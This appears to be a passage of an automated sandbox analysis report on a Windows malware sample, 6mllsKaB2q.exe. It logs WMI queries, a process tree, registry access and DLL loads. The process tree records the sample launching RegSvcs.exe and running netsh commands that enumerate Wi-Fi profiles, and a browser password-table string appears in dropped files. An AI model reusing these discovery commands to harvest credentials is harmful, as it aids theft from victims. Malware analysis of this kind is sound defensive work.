Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File read: C:\Users\user\Pictures\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tmpB55D.tmp.dat.7.dr, tmpB4BB.tmp.dat.7.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 6mllsKaB2q.exe

ReversingLabs: Detection: 71%

Source: unknown	Process created: C:\Users\user\Desktop\6mllsKaB2q.exe "C:\Users\user\Desktop\6mllsKaB2q.exe"
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\6mllsKaB2q.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\6mllsKaB2q.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid	Jump to behavior

Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
